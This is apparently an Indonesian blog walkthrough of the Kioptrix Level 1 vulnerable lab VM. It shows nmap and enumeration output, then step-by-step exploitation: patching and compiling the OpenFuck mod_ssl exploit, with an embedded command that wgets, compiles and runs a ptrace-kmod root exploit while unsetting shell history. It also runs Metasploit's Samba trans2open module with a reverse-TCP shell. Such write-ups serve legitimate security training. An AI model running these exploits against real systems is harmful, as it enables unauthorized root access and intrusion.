hack-crack: FLAG KIOPTRIX LEVEL 1

Bahan Praktek:
HOST/WIndows : 192.168.1.x
KALILINUX : 10.0.2.15 /NAT
KIOPTRIX : 192.168.56.103 /HOST Only ADAPTER

Ping Win ke Kali RTO, Ping Win ke Kiop Sukses

Ping KALI ke WIN RTO, Ping KALI ke Kiop Sukses

┌──(root㉿kali)-[~]

└─# ifconfig

eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500

inet 10.0.2.15 netmask 255.255.255.0 broadcast 10.0.2.255

inet6 fe80::9d69:7019:77fb:5b8 prefixlen 64 scopeid 0x20<link>

ether 08:00:27:22:46:4f txqueuelen 1000 (Ethernet)

RX packets 14748 bytes 9594944 (9.1 MiB)

RX errors 0 dropped 0 overruns 0 frame 0

TX packets 4262507 bytes 256663811 (244.7 MiB)

TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536

inet 127.0.0.1 netmask 255.0.0.0

inet6 ::1 prefixlen 128 scopeid 0x10<host>

loop txqueuelen 1000 (Local Loopback)

RX packets 1000 bytes 111406 (108.7 KiB)

RX errors 0 dropped 0 overruns 0 frame 0

TX packets 1000 bytes 111406 (108.7 KiB)

TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

┌──(root㉿kali)-[~]

└─# ping 192.168.56.103

PING 192.168.56.103 (192.168.56.103) 56(84) bytes of data.

64 bytes from 192.168.56.103: icmp_seq=1 ttl=254 time=1.15 ms

64 bytes from 192.168.56.103: icmp_seq=2 ttl=254 time=2.02 ms

64 bytes from 192.168.56.103: icmp_seq=3 ttl=254 time=1.76 ms

64 bytes from 192.168.56.103: icmp_seq=4 ttl=254 time=2.08 ms

64 bytes from 192.168.56.103: icmp_seq=5 ttl=254 time=1.79 ms

64 bytes from 192.168.56.103: icmp_seq=6 ttl=254 time=1.10 ms

--- 192.168.56.103 ping statistics ---

15 packets transmitted, 15 received, 0% packet loss, time 14411ms

rtt min/avg/max/mdev = 0.561/1.044/2.081/0.555 ms

┌──(root㉿kali)-[~]

└─# nmap -sV -A 192.168.56.103

Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-04 02:36 EDT

Nmap scan report for 192.168.56.103 (192.168.56.103)

Host is up (0.00052s latency).

Not shown: 994 filtered tcp ports (no-response)

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)

|_sshv1: Server supports SSHv1

| ssh-hostkey:

| 1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)

| 1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)

|_ 1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)

80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)

|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b

|_http-title: Test Page for the Apache Web Server on Red Hat Linux

| http-methods:

|_ Potentially risky methods: TRACE

111/tcp open rpcbind 2 (RPC #100000)

| rpcinfo:

| program version port/proto service

| 100000 2 111/tcp rpcbind

| 100000 2 111/udp rpcbind

| 100024 1 1024/tcp status

|_ 100024 1 1024/udp status

139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)

443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b

|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b

|_ssl-date: 2022-10-03T06:32:08+00:00; -1d00h05m25s from scanner time.

| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--

| Not valid before: 2009-09-26T09:32:06

|_Not valid after: 2010-09-26T09:32:06

|_http-title: 400 Bad Request

| sslv2:

| SSLv2 supported

| ciphers:

| SSL2_RC2_128_CBC_WITH_MD5

| SSL2_DES_64_CBC_WITH_MD5

| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5

| SSL2_RC4_64_WITH_MD5

| SSL2_DES_192_EDE3_CBC_WITH_MD5

| SSL2_RC4_128_EXPORT40_WITH_MD5

|_ SSL2_RC4_128_WITH_MD5

1024/tcp open status 1 (RPC #100024)

Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port

Device type: bridge|general purpose

Running (JUST GUESSING): Oracle Virtualbox (98%), QEMU (92%)

OS CPE: cpe:/o:oracle:virtualbox cpe:/a:qemu:qemu

Aggressive OS guesses: Oracle Virtualbox (98%), QEMU user mode network gateway (92%)

No exact OS matches for host (test conditions non-ideal).

Network Distance: 2 hops

Host script results:

|_smb2-time: Protocol negotiation failed (SMB2)

|_clock-skew: -1d00h05m25s

|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)

TRACEROUTE (using port 80/tcp)

HOP RTT ADDRESS

1 0.23 ms 10.0.2.2 (10.0.2.2)

2 0.25 ms 192.168.56.103 (192.168.56.103)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 38.41 seconds

Bisa juga kita gunakan perintah:
#enum4linux 192.168.56.103

Buka Browser di Kalilinux untuk tes port 80

Untuk mengetahui pada server ada Folder apa saja....gunakan perintah sbb:

---- Scanning URL: http://192.168.56.103/ ----

+ http://192.168.56.103/~operator (CODE:403|SIZE:273)

+ http://192.168.56.103/~root (CODE:403|SIZE:269)

+ http://192.168.56.103/cgi-bin/ (CODE:403|SIZE:272)

+ http://192.168.56.103/index.html (CODE:200|SIZE:2890)

==> DIRECTORY: http://192.168.56.103/manual/

==> DIRECTORY: http://192.168.56.103/mrtg/

==> DIRECTORY: http://192.168.56.103/usage/

TES PENETRASI KE PORT 111:

Pada hasil nmap di atas diproleh

111/tcp open rpcbind 2 (RPC #100000)

| rpcinfo:

| program version port/proto service

| 100000 2 111/tcp rpcbind

| 100000 2 111/udp rpcbind

| 100024 1 1024/tcp status

|_ 100024 1 1024/udp status

Artinya kita bisa mencoba null session koneksi:
#rpcclient -U "" 192.168.56.103

Jika tidak menghasilkan data user/akun yang ada....Juga jika gagal Membuat akun baru atau mengubah akun/pass yang sudah ada

rpcclient $> srvinfo

KIOPTRIX Wk Sv PrQ Unx NT SNT Samba Server

platform_id : 500

os version : 4.5

server type : 0x9a03

rpcclient $> createdomuser adi

result was NT_STATUS_ACCESS_DENIED

rpcclient $>

reff perintah rpcclient
https://www.willhackforsushi.com/sec504/SMB-Access-from-Linux.pdf
https://jrgraphix.net/man/R/rpcclient

maka harus masuk ke langkah berikutnya......

TES PENETRASI KE PORT 22:

Pada hasil nmap di atas diproleh

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)

kita lakukan sbbapakah ada library exploit yang support untuk OpenSSH 2.9

Karena tidak ada yang versi 2.9 maka kita lanjut tes penetrasi ke berikutnya...

TES PENETRASI KE PORT 443:

Hasil Nmap di atas adalah sbb:
Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b

lakukan hal sbb:

#searchsploit apache 1.3.20

Buka browser dan googling-kan sbb untuk mendapatkan library hack nya:
mod_ssl/2.8.4 openssl/0.9.6b exploit

atau bisa ke alamat sbb: https://www.exploit-db.com/exploits/764

Silakan di download.......dan default posisi download ada di /home/kali/Downloads/764.c

┌──(root㉿kali)-[~]

└─# cd /home/kali/Downloads

┌──(root㉿kali)-[/home/kali/Downloads]

└─# ls

764.c

Atau bisa juga menggunakan File 764.c bawaan dari Kalilinux:

┌──(root㉿kali)-[/home/kali/Downloads]

└─# searchsploit openfuck

-----------------------------------------------------

Exploit Title

--------------------------------------------------------------

Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Buffer Overflow | unix/remote/21671.c

Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (1) | unix/remote/764.c

Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2) | unix/remote/47080.c

----------------------------------------------

Shellcodes: No Results

Copy dan Sekaligus lakukan kompile....

#cp /usr/share/exploitdb/platforms/unix/remote/764.c /home/kali/Downloads/764.c

Buka Dan Edit File ybs
#vim OpenFuck.c

masukkan openssl rc4 dan md5 libraries

#include <openssl/rc4.h>

#include <openssl/md5.h>

Juga modif Link Address wget:
http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c

> apt-get install libssl-dev

> gcc -o OpenFuck 764.c -lcrypto

Jalankan :

> ./OpenFuck

hingga terbaca versi yang harus digunakan:

Trying out using the 0x6a option ….

> ./OpenFuck 0x6a 192.168.80.132 443 -c 40

It doesn’t work. next we try the other option,

> ./OpenFuck 0x6b 192.168.80.132 443 -c 40

Hingga diperoleh ROOT:

uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

Congrats, you have root now....

Setiap perintah CLI akan jalan disini....silakan lakukan penambahan user, pengubahan pass dsb...

JIKA ERROR:

lakukan update library,,,,

#apt-get install libssl-dev
#apt-get install libssl1.0-dev

perintah libssl1.0-dev mengakibatkan error sbb:

Reading package lists... Done
Building dependency tree       
Reading state information... Done
Package libssl1.0-dev is not available, but is referred to by another package.
This may mean that the package is missing, has been obsoleted, or
is only available from another source

E: Package 'libssl1.0-dev' has no installation candidate

It's managable to install it if you first remove libssl-dev but this removes other packages and breaks some functionalities

sudo apt-get remove libssl-dev
Reading package lists... Done
Building dependency tree       
Reading state information... Done
The following packages were automatically installed and are no longer required:
  libpcre2-16-0 libpcre2-32-0 libpcre2-dev libpcre2-posix2 php-json pkg-config pkg-php-tools shtool
Use 'sudo apt autoremove' to remove them.
The following packages will be REMOVED:
  libssl-dev php-dev php5.6-dev php7.0-dev php7.1-dev php7.2-dev php7.3-dev php7.4-dev php8.0-dev

KARENA:

Package libssl1.0-dev is not available, but is referred to by another package.

Gunakan cara sbb:
https://www.hypn.za.net/blog/2017/08/27/compiling-exploit-764-c-in-2017/
Atau
https://github.com/heltonWernik/OpenLuck

Atau
https://jhalon.github.io/vulnhub-kioptrix1/

ATAU DOWNLOAD DAN INSTALL MANUAL: https://pkgs.org/download/libssl1.0.0

Then changes to make (including Paul's) are:

1. Add this below line 24 (the last #include):

#include <openssl/rc4.h>

#include <openssl/md5.h>

#define SSL2_MT_ERROR 0

#define SSL2_MT_CLIENT_FINISHED 3

#define SSL2_MT_SERVER_HELLO 4

#define SSL2_MT_SERVER_VERIFY 5

#define SSL2_MT_SERVER_FINISHED 6

#define SSL2_MAX_CONNECTION_ID_LENGTH 16

2. Replace "COMMAND2" on (now) line 672:

#define COMMAND2 "unset HISTFILE; cd /tmp; wget https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; \n"

3. Add "const" to the beginning of (now) line 970:

const unsigned char *p, *end;

4. Replace the "if" on (now) line 1078 with:

if (EVP_PKEY_get1_RSA(pkey) == NULL) {

5. Replace the "encrypted_key_length" code on (now) line 1084 with:

encrypted_key_length = RSA_public_encrypt(RC4_KEY_LENGTH, ssl->master_key, &buf[10], EVP_PKEY_get1_RSA(pkey), RSA_PKCS1_PADDING);

6. Install "libssl-dev" (if not already installed):

apt-get install libssl-dev

7. Compile!

# gcc -o OpenFuck 764.c -lcrypto

+++++++++++++++++++++++++++++++++++++++++

Hingga diperoleh folder hack OpenFuck,

Selanjutnya ubah tipe data OpenFuck agar bisa di execute (+777 atau +755)

#chmod +755 OpenFuck

Terakhir ketikkan

./OpenFuck

Now providing the arguments to the exploit in order to get access.

./OpenFuck -b0 -c <Your IP> <Target IP>

At the end, boom, we are in as an administrator

Use .deb:

sudo apt install path_to_deb_file

sudo dpkg -i path_to_deb_file
Use tar.gz

tar -xzf archive-name.tar.gz

cd archive-name

./configure

make

sudo make install

cd<space>..

TES PENETRASI KE PORT 139/SAMBA:
Bisa juga kita masuk dengan memanfaatkan BUG SAMBA X.X nya
Dengan menggunakan tool metasploit kita bisa mengecek versi smb yang dijalankan.

root@kali:~# msfconsole

msf5 > use auxiliary/scanner/smb/smb_version

msf5 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.56.103

msf5 auxiliary(scanner/smb/smb_version) > run

Dengan menjalankan perintah tersebut kita mengetahui bahwa smb nya versi samba 2.2.1a

Setelah kita mengetahui versi dari smb nya kita coba mencari di google.com apakah ada kerentanan didalam versi tersebut.Misal di dapat link Bug rapid7 sbb:

https://www.rapid7.com/db/modules/exploit/linux/samba/trans2open

Kita mencoba masuk kedalam sistem kioptrix mengguanakan celah keamanan tersebut. Selanjutnya kita menuliskan perintah dibawah ini untuk mendapatkan akses root di dalam siste kioptrix.

root@kali:~# msfconsole

msf5 > use exploit/linux/samba/trans2open

msf5 exploit(linux/samba/trans2open) > set RHOSTS 192.168.56.103

msf5 exploit(linux/samba/trans2open) > set payload linux/x86/shell/reverse_tcp

msf5 exploit(linux/samba/trans2open) > exploit

akhirnya menjadi root kita nya

Dan kita sudah bisa login pada OS kioptrix dengan password yang telah kita ganti.

Reff:

https://fromzerotoone.in/en/posts/vulnhub-kioptrix-level-1/
https://steemit.com/security/@shifty0g/walkthrough-kioptrix-level-1-1
https://blog.sekolahhacker.com/write-up-kioptrix-level-1/

hack-crack

Selasa, 04 Oktober 2022

FLAG KIOPTRIX LEVEL 1

Tidak ada komentar:

Posting Komentar